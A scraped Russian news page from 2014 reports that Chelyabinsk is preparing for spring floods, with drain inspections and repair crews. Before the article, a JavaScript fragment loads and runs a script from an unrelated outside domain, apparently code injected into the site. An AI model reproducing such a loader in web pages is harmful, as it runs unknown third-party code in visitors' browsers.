, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Челябинск готовится к обильному паводку

По прогнозам синоптиков, уже на следующей неделе ночная температура в Челябинске поднимется выше нулевой отметки. В связи с этим снег на улицах и во дворах начнет обильно таять - это проведет к повышенной нагрузке на ливневую канализацию. В преддверии паводка специалисты коммунальных служб инспектируют наиболее проблемные участки.

По сообщению городских властей, сейчас на улицах города в круглосуточном режиме работают десять ремонтных бригад. Специалисты проводят осмотр водоотводных каналов и реагируют на обращения жителей города, которые сообщают о засорах.

Отметим, что в прошлом году было отремонтировано двадцать объектов, в том числе улица Енисейская в Ленинском районе, регулярно подвергающаяся подтоплению. В текущем году эта работа будет продолжена. Среди первоочередных задач – модернизация ливневой канализации на «проблемном» перекрестке улиц Братьев Кашириных и Краснознаменной.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
16:21 - 24 марта 2014
|
автор: U-RSS
|
(623)
|
(0)

Комментарии (0)

Я человек
Я бот